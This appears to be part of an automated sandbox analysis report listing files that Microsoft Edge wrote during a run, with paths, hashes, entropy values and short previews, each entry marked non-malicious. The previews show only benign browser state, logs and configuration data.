                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\12e3bcd7-e972-461b-b5e1-e05ba0e3ce69.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\137d3999-00a9-4672-8a4b-c8c464bd0bef.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\93d733dd-e292-496d-a4c3-c87387fc3271.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3e734.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c9562067-c856-40d3-9e8e-5c8ebd834425.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):426
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2146850535924125
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:tCyvVaYebvqBZFUt8W/+7R5OaYebvqBaJ:EYVaYebvyg8TDOaYebvL
                                                                                                                                                                                                                                                                                                MD5:0BFA7315D70FF077479FCD86F2131501
                                                                                                                                                                                                                                                                                                SHA1:AC3DF4F7FC5A16381FFABCB1388BF265A5A42015
                                                                                                                                                                                                                                                                                                SHA-256:46EC7F15A2631730E895B28B5487F2DB5C4F9E4FBAF0684A3D2F8C36D693C190
                                                                                                                                                                                                                                                                                                SHA-512:4E1B4E3C6434D82540E652FBA33FE98AB14D10744670E12EDEF208819EC00CA09E9F314CD30B843FBCD8B0B68AE0D0EC30A61E2E2971D1417900838D86D750F9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.808 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-01:31:49.810 1c74 Recovering log #3.2024/12/20-01:31:49.813 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):426
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2146850535924125
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:tCyvVaYebvqBZFUt8W/+7R5OaYebvqBaJ:EYVaYebvyg8TDOaYebvL
                                                                                                                                                                                                                                                                                                MD5:0BFA7315D70FF077479FCD86F2131501
                                                                                                                                                                                                                                                                                                SHA1:AC3DF4F7FC5A16381FFABCB1388BF265A5A42015
                                                                                                                                                                                                                                                                                                SHA-256:46EC7F15A2631730E895B28B5487F2DB5C4F9E4FBAF0684A3D2F8C36D693C190
                                                                                                                                                                                                                                                                                                SHA-512:4E1B4E3C6434D82540E652FBA33FE98AB14D10744670E12EDEF208819EC00CA09E9F314CD30B843FBCD8B0B68AE0D0EC30A61E2E2971D1417900838D86D750F9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.808 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/20-01:31:49.810 1c74 Recovering log #3.2024/12/20-01:31:49.813 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.121555176232549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFcqM+q2PN723oH+TcwtpIFUt8IFBVZZmw+IFBVMMVkwON723oH+Tcwta/WLJ:NcqM+vVaYebmFUt8cBn/+cBaMV5OaYev
                                                                                                                                                                                                                                                                                                MD5:3127DD432B5C9C083F65DA2B1A78EC1D
                                                                                                                                                                                                                                                                                                SHA1:E86F153E15B99E6EBC08796191446E7EDECE0A30
                                                                                                                                                                                                                                                                                                SHA-256:95C402440FFAC92C81915C5553FA715AD26E170D1DAE466B1C75EC8DF61D8EB9
                                                                                                                                                                                                                                                                                                SHA-512:49C631FE9DBE1EBD568368D347D6E2ABBE23D3F669946F49EC7848D92D38F918C95C245259FAB7A8629707E4C635903BC21F84B30091FBBD4CC2167348CD8012
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.323 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-01:31:31.324 1d6c Recovering log #3.2024/12/20-01:31:31.324 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.121555176232549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFcqM+q2PN723oH+TcwtpIFUt8IFBVZZmw+IFBVMMVkwON723oH+Tcwta/WLJ:NcqM+vVaYebmFUt8cBn/+cBaMV5OaYev
                                                                                                                                                                                                                                                                                                MD5:3127DD432B5C9C083F65DA2B1A78EC1D
                                                                                                                                                                                                                                                                                                SHA1:E86F153E15B99E6EBC08796191446E7EDECE0A30
                                                                                                                                                                                                                                                                                                SHA-256:95C402440FFAC92C81915C5553FA715AD26E170D1DAE466B1C75EC8DF61D8EB9
                                                                                                                                                                                                                                                                                                SHA-512:49C631FE9DBE1EBD568368D347D6E2ABBE23D3F669946F49EC7848D92D38F918C95C245259FAB7A8629707E4C635903BC21F84B30091FBBD4CC2167348CD8012
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.323 1d6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/20-01:31:31.324 1d6c Recovering log #3.2024/12/20-01:31:31.324 1d6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2678890710798698
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:L/2qOB1nxCkMWSA1LyKOMq+8iP5GDHP/0jMVum8:Kq+n0JW91LyKOMq+8iP5GLP/0Z
                                                                                                                                                                                                                                                                                                MD5:4410796A6E7A6E64DCA5EC2B9B8941AD
                                                                                                                                                                                                                                                                                                SHA1:14B68BB9ACACE8FD53484EC0F538E5B9CBC169DE
                                                                                                                                                                                                                                                                                                SHA-256:E675A0BB00F57AABC0D8190BDEBE53175794578111BAD71FB30E32221F1E4915
                                                                                                                                                                                                                                                                                                SHA-512:35EF59EBA6F084DDA22D48B8C58183609C20162328B0F022FFB329FCCC3BC28EAF832858B420EC0F203C9D36A9CF9F902C22E7BBBCAA870E98E1FA10E61CCB19
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.46681860061706393
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0GH:v7doKsKuKZKlZNmu46yjx0i
                                                                                                                                                                                                                                                                                                MD5:D97F56DB859BA32A3876EDB4B4D9C7F0
                                                                                                                                                                                                                                                                                                SHA1:839E66AD666C1E655E24C2ED7A3C7B0EC28F1ADC
                                                                                                                                                                                                                                                                                                SHA-256:56C5D19ED15EE93B57A114EC10ED5815AFCC6759F7144B26A53F6FBEAE914869
                                                                                                                                                                                                                                                                                                SHA-512:7C6DD1482A211AC37E05843D863DF7D2D56E0CE119896C706612E7C0B026D320C0A1827AAFDD79E7521CAB7DC7A34C028EDC8D85ACBC029AB0F2330ED7DE139F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c2eea566-4c8b-49b4-9b15-daddd4c6ced1.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.567490185483211
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQxNMrWoUW5wcOf4yt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0QIGLeurwXhfpXtL:Ya+rxUWacOfTtu1jat0KrntL
                                                                                                                                                                                                                                                                                                MD5:438FDD906E9FAB2679F38815B79A49AD
                                                                                                                                                                                                                                                                                                SHA1:83097EAF926A2FFE2D3F7F2EE424B78DD10E2B32
                                                                                                                                                                                                                                                                                                SHA-256:CBCEF6D7A9FFE7B7E80E4F5F468F8E2E7E597568C5871F2256CEBDECEA2E8047
                                                                                                                                                                                                                                                                                                SHA-512:B2619B4C1E043B5F085DB40D931AF11421BCEBC59C1E7A4C5C70AEB585CA06B67923DD2BEB24C682BF49404589C7C087935121D7C436613C350791574842C0DB
                                                                                                                                                                                                                                                                                                Malicious:false
